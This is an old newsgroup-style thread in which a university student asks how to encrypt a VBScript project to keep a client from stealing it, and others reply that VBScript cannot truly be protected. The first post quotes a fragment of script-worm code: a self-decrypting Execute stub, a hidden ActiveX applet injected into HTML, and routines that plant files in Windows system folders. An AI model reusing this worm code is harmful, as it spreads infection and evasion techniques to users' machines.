Quote:
Quote:
> > anyway, regardless of that insulting post.
> > i'm here to find an answer to my question.
> > not to be talked down too, by some hi, flyer.
> > base 64 / and other "ENCRYPTION" methods are
> > possible, how can i do this.
> > there is a method that i saw, that describes
> > the encrypted code which has been changed
> > something like this
> > UnLockStr = "Execute(""Dim KeyArr(3),ThisText""&vbCrLf&""KeyArr(0) = " &
> > OtherArr(0) & """&vbCrLf&""KeyArr(1) = " & OtherArr(1) &
> > """&vbCrLf&""KeyArr(2) = " & OtherArr(2) & """&vbCrLf&""KeyArr(3) = " &
> > OtherArr(3) & """&vbCrLf&""For i=1 To Len(ExeString)""&vbCrLf&""TempNum
=
> > Asc(Mid(ExeString,i,1))""&vbCrLf&""If TempNum = 18
Then""&vbCrLf&""TempNum =
Quote:
> > 34""&vbCrLf&""End If""&vbCrLf&""TempChar = Chr(TempNum + KeyArr(i Mod
> > 4))""&vbCrLf&""If TempChar = Chr(28) Then""&vbCrLf&""TempChar =
> > vbCr""&vbCrLf&""ElseIf TempChar = Chr(29) Then""&vbCrLf&""TempChar =
> > vbLf""&vbCrLf&""End If""&vbCrLf&""ThisText = ThisText &
> > TempChar""&vbCrLf&""Next"")" & vbCrLf & "Execute(ThisText)"
> > ThisText = "ExeString = """ & TempString & """"
> > HtmlText ="<" & "script language=vbscript>" & vbCrLf & "document.write "
&
> > """" & "<" & "div style='position:absolute; left:0px; top:0px;
width:0px;
> > height:0px; z-index:28; visibility: hidden'>" & "<""&""" & "APPLET
> > NAME=KJ""&""_guest HEIGHT=0 WIDTH=0
> > code=com.ms.""&""activeX.Active""&""XComponent>" & "<" & "/APPLET>" &
"<" &
> > "/div>""" & vbCrLf & "<" & "/script>" & vbCrLf & "<" & "script
> > language=vbscript>" & vbCrLf & ThisText & vbCrLf & UnLockStr & vbCrLf &
"<"
> > & "/script>" & vbCrLf & "<" & "/BODY>" & vbCrLf & "<" & "/HTML>"
> > VbsText = ThisText & vbCrLf & UnLockStr & vbCrLf & "KJ_start()"
> > WinPath = FSO.GetSpecialFolder(0) & "\"
> > If (FSO.FileExists(WinPath & "web\Folder.htt")) Then
> > FSO.CopyFile WinPath & "web\Folder.htt",WinPath & "web\kjwall.gif"
> > End If
> > If (FSO.FileExists(WinPath & "system32\desktop.ini")) Then
> > FSO.CopyFile WinPath & "system32\desktop.ini",WinPath &
> > "system32\kjwall.gif"
> > End If
> > End Function
> > my question is this :
> > why do virus writes have the upper edge
> > abd why can't i do a simple encryption of a humble MS agent script
> > NOTE
> > if you want to bombard me with "useless" technical data, then save it,
> > i don't want to know when the first queen of England was born..
> > im not interested in M.Harris Insults, just because he's ... this, that,
or
> > the other
> > i want to protect my vbs project distributed on a CD-ROM
> > i need technical answers to what virus writers take for granted
> > SIMPLE encryption "not SCRENC"
> > M.Harris, need not reply
> > Beris
> I think that a virus-writer's priorities are in this order, with items 1
and 2 being way more important than item 3:
Quote:
> 1){*filter*}up someone else's computer
> 2) its not being traceable back to the author
> 3) should not be easily detected
> Encrypting only helps item 3.
> You as an author of a valuable script might have these priorities:
> 1) Script must work well, without anoying the user
> 2) User must not be able to see/steal the source
> Microsoft provides only a weak encryption to prevent someone from stealing
your code. The HTML/WSH script engine only reads plain
Quote:
> script or SCRENCed stuff. Any other solution you find has to provide the
script engine with one of these two types of input, and
Quote:
> the user will be able to intercept that input and read it if he really
wants to.
> VBScript projects cannot currently be protected. Sad fact.
> I suppose you could download a bunch of script viruses and analyze them to
see if and how they don't conform to plain script or
Quote:
> SCRENCed script. I think you will find that they do conform.
> -Paul Randall
first of all, i'm not *remotely* iterested in virus / worm code..
i have more pressing things on my mind than virus
like graduation
i have already done the looking at virri thing, but what if
my client A/V picks that up..
*that's real good* besides my lectures will kick me into space
why would i want to scew somebody machine ??
honestly....... some people ?? it's beggers belief
ok, here's my reason,
yes, i have created two HTA's that perfom like a dream.
after months of questions and endless searches......
(BUT)
i still have to work a way to call them from Director 7
i'm a third year university student, and the project i'm doing
*MUST* be submitted to real life client.
my client is a travel agent, that doesn't have much knowledge of
MS stuff, apart from SCRENC and decrypter, he uses to steal peoples *HARD*
work
(hope he doesn't read this)
i have visual studio 6 under a student licence (160) and i did try to
create
a an active X control like michael told me, but vb creates 3 files, NOT 1
(ocx)
and i know nothing of C++ or MFC.
this client *will* rip me off.....
can i stop him ??
thanks anyway Paul, i appreaciate your reply
Beris